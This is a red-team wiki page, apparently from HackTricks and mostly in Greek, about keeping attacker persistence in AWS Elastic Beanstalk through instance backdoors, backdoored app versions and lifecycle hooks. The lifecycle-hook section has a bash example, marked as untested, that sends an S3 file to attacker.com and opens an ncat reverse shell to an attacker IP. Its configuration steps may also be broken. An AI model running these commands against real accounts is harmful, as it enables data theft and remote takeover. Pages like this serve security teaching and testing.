AWS - Elastic Beanstalk Persistence

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

Check the subscription plans!
Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

Elastic Beanstalk

Για περισσότερες πληροφορίες ελέγξτε:

AWS - Elastic Beanstalk Enum

Persistence in Instance

Για να διατηρηθεί η επιμονή μέσα στον λογαριασμό AWS, θα μπορούσε να εισαχθεί κάποιο μηχανισμός επιμονής μέσα στην instance (cron job, ssh key...) ώστε ο επιτιθέμενος να μπορεί να έχει πρόσβαση και να κλέψει τα credentials του IAM role από την υπηρεσία μεταδεδομένων.

Backdoor in Version

Ένας επιτιθέμενος θα μπορούσε να προσθέσει backdoor στον κώδικα μέσα στο S3 repo ώστε να εκτελεί πάντα το backdoor του και τον αναμενόμενο κώδικα.

New backdoored version

Αντί να αλλάξει τον κώδικα στην τρέχουσα έκδοση, ο επιτιθέμενος θα μπορούσε να αναπτύξει μια νέα backdoored έκδοση της εφαρμογής.

Abusing Custom Resource Lifecycle Hooks

TODO: Test

Το Elastic Beanstalk παρέχει lifecycle hooks που σας επιτρέπουν να εκτελείτε προσαρμοσμένα scripts κατά τη διάρκεια της προμήθειας και τερματισμού της instance. Ένας επιτιθέμενος θα μπορούσε να ρυθμίσει ένα lifecycle hook για να εκτελεί περιοδικά ένα script που εξάγει δεδομένα ή διατηρεί πρόσβαση στον λογαριασμό AWS.

bashCopy code# Attacker creates a script that exfiltrates data and maintains access
echo '#!/bin/bash
aws s3 cp s3://sensitive-data-bucket/data.csv /tmp/data.csv
gzip /tmp/data.csv
curl -X POST --data-binary "@/tmp/data.csv.gz" https://attacker.com/exfil
ncat -e /bin/bash --ssl attacker-ip 12345' > stealthy_lifecycle_hook.sh

# Attacker uploads the script to an S3 bucket
aws s3 cp stealthy_lifecycle_hook.sh s3://attacker-bucket/stealthy_lifecycle_hook.sh

# Attacker modifies the Elastic Beanstalk environment configuration to include the custom lifecycle hook
echo 'Resources:
AWSEBAutoScalingGroup:
Metadata:
AWS::ElasticBeanstalk::Ext:
TriggerConfiguration:
triggers:
- name: stealthy-lifecycle-hook
events:
- "autoscaling:EC2_INSTANCE_LAUNCH"
- "autoscaling:EC2_INSTANCE_TERMINATE"
target:
ref: "AWS::ElasticBeanstalk::Environment"
arn:
Fn::GetAtt:
- "AWS::ElasticBeanstalk::Environment"
- "Arn"
stealthyLifecycleHook:
Type: AWS::AutoScaling::LifecycleHook
Properties:
AutoScalingGroupName:
Ref: AWSEBAutoScalingGroup
LifecycleTransition: autoscaling:EC2_INSTANCE_LAUNCHING
NotificationTargetARN:
Ref: stealthy-lifecycle-hook
RoleARN:
Fn::GetAtt:
- AWSEBAutoScalingGroup
- Arn' > stealthy_lifecycle_hook.yaml

# Attacker applies the new environment configuration
aws elasticbeanstalk update-environment --environment-name my-env --option-settings Namespace="aws:elasticbeanstalk:customoption",OptionName="CustomConfigurationTemplate",Value="stealthy_lifecycle_hook.yaml"

Υποστήριξη HackTricks

Ελέγξτε τα σχέδια συνδρομής!
Εγγραφείτε στην 💬 ομάδα Discord ή στην ομάδα telegram ή ακολουθήστε μας στο Twitter 🐦 @hacktricks_live.
Μοιραστείτε κόλπα hacking υποβάλλοντας PRs στα HackTricks και HackTricks Cloud github repos.

PreviousAWS - ECS Persistence NextAWS - EFS Persistence

Last updated 3 days ago